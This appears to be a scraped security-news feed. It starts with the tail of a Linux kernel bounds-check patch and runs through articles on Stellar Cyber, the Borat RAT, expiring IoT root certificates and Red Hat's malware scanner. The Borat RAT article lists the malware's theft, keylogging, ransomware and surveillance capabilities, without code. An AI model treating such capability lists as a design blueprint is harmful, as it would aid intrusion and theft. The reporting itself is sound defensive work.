+			if (data->block\[0\] < 1 || data->block\[0\] > I2C\_SMBUS\_BLOCK\_MAX)
+				return -EINVAL;
+
 			dma\_size = data->block\[0\] + 1;
 			dma\_direction = DMA\_TO\_DEVICE;
 			desc->wr\_len\_cmd = dma\_size;
-- 
2.25.1

^ permalink raw reply	\[**flat**|nested\] 2+ messages in thread

end of thread, other threads:\[~2022-07-29 11:02 UTC | newest\]

**Thread overview:** 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2022-07-29  9:34 \[PATCH\] i2c: ismt: Fix an out-of-bounds bug in ismt\_access() Zheyu Ma
2022-07-29 11:02 Zheyu Ma

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

CVE-2022-2873: Fix an out-of-bounds bug in ismt_access()

Threat intel has changed over the years and that’s changed how customers use it, says Matt Olney, director of Talos threat intelligence and interdiction at Cisco.

Threat intel has changed over the years and that’s changed how customers use it, says Matt Olney, director of Talos threat intelligence and interdiction at Cisco.

Dark Reading

Threat intel has changed over the years and that’s changed how customers use it, says Matt Olney, director of Talos threat intelligence and interdiction at Cisco. He discusses new ransomware dangers and what users can do to protect themselves. And he describes in detail how Cisco intelligence was used to respond to a recent large-scale security event. He closes with some tips about how to better protect your organization against ransomware.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Cisco: All Intelligence is Not Created Equal

By Waqas
Barmak Meftah is joining the innovator of Open XDR, Stellar Cyber in a new advisory role. What does…
This is a post from HackRead.com Read the original post: Barmak Meftah Joins Stellar Cyber, Innovator of Open XDR, as Board Advisor

****Barmak Meftah is joining the innovator of Open XDR, Stellar Cyber in a new advisory role. What does that mean for the company and the industry?****

What does the future of cybersecurity hold? Stellar Cyber might have the answer to that question, and they’re bringing reinforcements. 

On August 22nd, **Stellar Cyber** announced a new member in the form of a leadership role. Seasoned cybersecurity leader Barmak Meftah is joining the team as an advisor to the Board of Directors to encourage growth and innovation within the company further.

What can we expect from his new role based on his previous work in prominent **cybersecurity companies**? 

How has Stellar Cyber already paved the way toward more efficient security for enterprises?

Let’s find out.

**Bringing 25 Years of Experience to His New Role**

Meftah brings a stellar track record to his new leadership role. He brings 25 years of the innovative **cybersecurity market** and management experience.

His contribution has been significant within companies currently known as leaders in the cybersecurity field — including AlienVault.

In addition to his leadership positions at **AT&T Cybersecurity and AlienVault**, he previously held management positions at Hewlett-Packard, Fortify Software, Synchron, and Oracle.

Barmak Meftah

**Changming Liu**, CEO, and Co-Founder and CEO of Stellar Cyber says “His leadership experience at AT&T and AlienVault and his current role as an investor focusing on cybersecurity are invaluable to us. We are excited to inject his insights into our strategy sessions and carry out his vision of building an open and intelligent platform to democratize cybersecurity.”

**Stellar Cyber’s Open XDR Platform**

Stellar Cyber is the innovator of Open XDR. Their platform delivers comprehensive, unified security without complexity, empowering lean security teams of any skill to successfully secure their environments.

This allows organizations to reduce risks with early and precise identiﬁcation and remediation of threats while cutting costs, retaining investments in existing tools, and improving analyst productivity, delivering a 20X improvement in MTTD and an 8X improvement in MTTR.

**Continuing Where He Left Off With AlienVault**

Stellar Cyber’s specialty is also an area of cybersecurity where Meftah fits right in. In his new position, he’s going to continue the work that he had always envisioned accomplishing for AlienVault.

“At AlienVault, we delivered an excellent product to unify appropriate security components and make detection and response super-easy and accessible. In addition, we always had the vision to be an open platform and integrate with customers’ existing security stack,” said Meftah.

“Today this vision has emerged as Open XDR, and Stellar Cyber is at the forefront of this accelerating trend. I’m thrilled to help advise the company as it continues to innovate and rapidly grow market share.”

**Joe Morin**, CEO of CyFlare, adds, “We adopted AlienVault a couple of years ago because it was the NG-SIEM pioneer and market leader, and it performed well for us. We adopted Stellar Cyber because it unifies SIEM, SOAR, and NDR, and it makes our analysts more productive.”

**Pioneering Innovation and Progress**

Models such as Open XDR are steadily uniting the most popular solutions that have been existing in silos and heading toward accessible and less convoluted security.

For cyber analysts, this means that they can do more regardless of their limited manpower and resources. For businesses, this means they can secure their companies with technology that is more effective for less costly.

Stellar Cyber is already changing the face of the cybersecurity industry one improvement at a time. With Meftah’s contribution, it’s bound to head in a new, innovative, and exciting direction.

1.  **A State in the US arrested cyber security specialists it hired**
2.  **If a Cyber Security Report Falls in a Forest, Is Anyone Listening?**
3.  **Cyber Security companies dismantle Trickbot ransomware botnet**
4.  **Cybersecurity firm Mandiant Denies LockBit Ransomware’s Hacking Claim**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Barmak Meftah Joins Stellar Cyber, Innovator of Open XDR, as Board Advisor

Atlanta-based cyber risk intelligence company, Cyble discovered a new Remote Access Trojan (RAT) malware. What makes this particular RAT malware distinct enough to be named after the comic creation of Sacha Baron Cohen?
RAT malware typically helps cybercriminals gain complete control of a victim's system, permitting them to access network resources, files, and power to toggle the mouse and

Atlanta-based cyber risk intelligence company, Cyble discovered a new Remote Access Trojan (RAT) malware. What makes this particular RAT malware distinct enough to be named after the comic creation of Sacha Baron Cohen?

RAT malware typically helps cybercriminals gain complete control of a victim's system, permitting them to access network resources, files, and power to toggle the mouse and keyboard. Borat RAT malware goes beyond the standard features and enables threat actors to deploy ransomware and **DDoS attacks**. It also increases the number of threat actors who can launch attacks, sometimes appealing to the lowest common denominator. The added functionality of carrying out DDoS attacks makes it insidious and a risk to today's digital organizations.

Ransomware has been the most common top attack type for over three years. According to an IBM report, REvil was the most common ransomware strain, consisting of about 37% of all ransomware attacks. Borat RAT is a unique and powerful combination of RAT, spyware, and ransomware capabilities fused into a single malware.

**Borat RAT: What Makes It a Triple Threat?**

The Borat RAT provides a dashboard for malicious hackers to perform RAT malware activities and the ability to compile the malware binary for DDoS and **ransomware attacks** on the victim's machine. The RAT also includes code to launch a DDoS attack, slows down response services to legitimate users, and can even cause the site to go offline.

Remarkably, Borat RAT can deliver a ransomware payload to the victim's machine to encrypt users' files and demand a ransom. The package also includes a keylogger executable file that monitors keystrokes on victims' computers and saves them in a .txt file for exfiltration.

The other functionalities of Borat RAT malwarethat make it fun or not so fun including

*   A reverse proxy to protect the hacker
*   The ability to steal credentials from browsers or discord tokens
*   Introduce malicious code into legitimate processes

To annoy or scare its victims, the Borat RAT can also perform the following actions:

*   Switching off and on the monitor
*   Hiding/showing the desktop features such as the start button and taskbar
*   Playing unwanted audio
*   Switching the webcam light on/off

The Borat RAT malwarewill check to see if the system has a connected microphone and if so, will record audio from the computer, which will be saved in another file called "micaudio.wav." Similarly, the malware can begin recording from the camera if a webcam is discovered on the system.

**Should Businesses Develop a Solid Response Strategy?**

The volatile landscape set by the pandemic has led to every industry being a potential target for pre-packaged malware sets like Borat. All it takes is an unsuspecting employee to accidentally click a malicious link or attachment to give full access to your organization's systems. This can result in operations being halted until the ransom is paid. The halt in operations leads to huge financial and physical losses for the company.

The remote desktop function, which is included in the Borat RAT malware, can wreak havoc on your business as it allows the threat actor to delete critical information/intellectual rights, grab the version of the operating system and the model of the machine and steal potential cookies/saved login credentials. So, companies need to keep an eye out for the threat and prepare themselves against such attacks.

**Recommendations for Enhanced Security**

Let's look at the recommendations listed below to secure your networks against the risk of cyberattacks:

*   Examine the use of remote administration tools for applications and systems on the industrial network. Remove any remote administration tools that aren't necessary for the industrial process
*   Establish strong password management and enable multi-factor authentication
*   Utilize reputed antivirus software and internet security packages
*   Include a response strategy to contain the threat immediately
*   Utilize flash storage solutions and set relevant measures to back up data. This will help promote operational continuity and lower infrastructural costs
*   Avoid keeping important files in common locations such as Desktop and My Documents
*   Employ an email software security solution that can classify and filter out malicious emails. Employees can also have regular training sessions to gain awareness of the upcoming threats
*   Refine and optimize your vulnerability management system. This will help your organization prioritize the vulnerabilities of most concern

Organizations need to empower their employees to understand the current threat landscape better. Investing in the right technologies and creating robust verification measures can ensure that the right individuals can access the right data. Resolving incidents quickly and efficiently in today's fast-paced digital world is imperative.

Organizations that strategically plan for the next threat will have a positive customer experience in the long run. Solutions like **AppTrana** help you focus on expanding your business operations without worrying about the safety of your critical assets.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Meet Borat RAT, a New Unique Triple Threat

What happens when businesses' smart devices break? CSOs have things to fix beyond security holes.

So many everyday items in the developed world are now connected to the Internet, often inexplicably. It adds another layer of potential technology failure that for personal appliances can be something of an amusing annoyance: blinds that won't open, microwaves that don't adjust for time changes, refrigerators that need firmware updates.

But in the enterprise, when Internet of Things devices fail, it's no Twitter-thread joke. Factory assembly lines grind to a halt. Heart-rate monitors in hospitals switch offline. Elementary school smart boards go dark.

Smart device failures are an increasing risk in the enterprise world, and not just because of the oft-discussed security worries. It's because some of these devices' root certificates — necessary for them to connect to the Internet securely — are expiring.

"Devices need to know what to trust, so the root certificate is built into the device as an authentication tool," explains Scott Helme, a security researcher who has written extensively about the root certificate expiration issue. "Once the device is in the wild it tries to call 'home' — an API or manufacturer's server — and it checks against this root certificate to say, 'Yes, I'm connecting to this correct secure thing.' Essentially \[a root certificate is\] a trust anchor, a frame of reference for the device to know what it's speaking to."

In practice this authentication is like a web or a chain. Certificate authorities (CAs) issue all kinds of digital certificates, and the entities "talk" to each other, sometimes with multiple levels. But the first and most core link of this chain is always the root certificate. Without it, none of the levels above could make the connections possible. So if a root certificate stops working, the device can't authenticate the connection and won't link to the Internet.

Here's the problem: The concept of the encrypted Web developed around 2000 — and root certificates tend to be valid for about 20 to 25 years. In 2022, then, we're smack in the middle of that expiration period.

The CAs have issued plenty of new root certificates in the last two-plus decades, of course, well ahead of expirations. That works well in the personal device world, where most people frequently upgrade to new phones and click to update their laptops, so they would have these newer certs. But in the enterprise, it can be far more challenging or even impossible to update a device — and in sectors like manufacturing, machines may indeed still be on the factory floor 20 to 25 years later.

Without an Internet connection, "these devices aren't worth a thing," says Kevin Bocek, vice president of security strategy and threat intelligence at Venafi, provider of machine identity management services. "They essentially become bricks \[when their root certs expire\]: They can't trust the cloud anymore, can't take commands, can't send data, can't take software updates. That's a real risk, particularly if you're a manufacturer or an operator of some kind."

**A Warning Shot**

The risk isn't theoretical. On September 30, a root certificate issued by the massive CA Let's Encrypt expired — and several services across the Internet broke. The expiration wasn't a surprise, as Let's Encrypt had long been warning its customers to update to a new cert.

Still, Helme wrote in a blog post 10 days before the expiration, "I'm betting a few things will probably break on that day." He was right. Some services from Cisco, Google, Palo Alto, QuickBooks, Fortinet, Auth0, and many more companies failed.

"And the weird thing about that," Helme tells Dark Reading, "is that the places using Let's Encrypt are by definition very modern — you can't just go to their website and pay your $10 and download your certificate by hand. It has to be done by a machine or via their API. These users were advanced, and it was still a really big problem. So what happens when we see \[expirations\] from the more legacy CAs that have these big enterprise customers? Surely the knock-on effect will be larger."

**The Path Forward**

But with some changes, that knock-on effect doesn't have to happen, says Venafi's Bocek, who views the challenge as one of knowledge and chain of command — so he sees solutions in both awareness and early collaboration.

"I'm really excited when I see chief security officers and their teams getting involved on the manufacturer and developer level," Bocek says. "The question is not just, 'Can we develop something that is safe?' but 'Can we continue to operate it?' There's often a shared responsibility of operation on these high-value connected devices, so we need to be clear on how we're going to handle that as a business."

Similar conversations are happening in the infrastructure sector, says Marty Edwards, deputy CTO for operational technology and IoT at Tenable. He's an industrial engineer by trade who has worked with utility companies and the US Department of Homeland Security.

"Quite frankly, in the industrial space with utilities and factories, any event that leads to a production outage or loss is concerning," Edwards says. "So in these specialty circles the engineers and developers are certainly looking at the impacts \[of expiring root certificates\] and how we can fix them."

Though Edwards stresses he's "optimistic" about those conversations and the push for cybersecurity considerations during the procurement process, he believes more regulatory oversight is also needed.

"Something like a baseline standard of care that perhaps includes language on how to maintain the integrity of a certificate system," Edwards says. "There's been discussions between various standards groups and governments about traceability for mission-critical devices, for example."

As for Helme, he'd love to see enterprise machines set for updates in a way that's realistic and not arduous for the user or the manufacturer — a new certificate issued and update downloaded every five years, perhaps. But manufacturers won't be incentivized to do that unless enterprise customers push for it, he notes.

"In general, I do think that this is something the industry needs to fix," Edwards agrees. "The good news is most of these challenges aren't necessarily technological. It's more about knowing how it all works, and getting the right people and procedures in place."

Expiring Root Certificates Threaten IoT in the Enterprise

The beta of Red Hat Insights malware detection service is now available.

The beta of **Red Hat Insights** malware detection service is now available. The malware detection service is a monitoring and assessment tool that scans **Red Hat Enterprise Linux** (RHEL) systems for the presence of malware, utilizing over 175 signatures of known Linux malware provided in partnership with the IBM X-Force Threat Intelligence team. The Red Hat Insights analysis provides:

*   The list of signatures scanned against your RHEL systems, with links to reference information and analysis reports
    
*   Results for individual system scans and aggregated results for all of your RHEL systems
    

To scan your Red Hat Insights systems for potential malware, follow our getting started guide. After your first full scan, you can view the results in the beta version of Insights malware detection. 

**Please note**: Due to the potentially sensitive nature of this information, only Organizational Admins have default access to the results. All other users must first be given access to the service, as detailed in section 2.2. of the Insights malware detection guide.

We hope you don’t see a screen like the one below, but if signature matches are found on your systems, you will see details about the signatures, the number of systems that were matched and details about where on the system the matches were found.

Like the other Insights services, malware detection is included in your RHEL subscription. Malware detection supports RHEL 7 Server / Workstation and RHEL 8 and 9 hosts.

Any feedback about the new malware detection service can be sent to us using the Feedback button inside of Insights — you can see it in the above screenshot on the lower right hand side of the page. Please give the Insights malware detection service a try soon!

Shane McDowell is a Principal Product Manager for Red Hat. He is focused on helping customers manage their infrastructure in the hybrid cloud. He brings 20+ years of experience with delivering and supporting technology solutions to users in a variety of industries, including Information Technology, Talent Acquisition and Residential Management.

Read full bio

Tag

#intel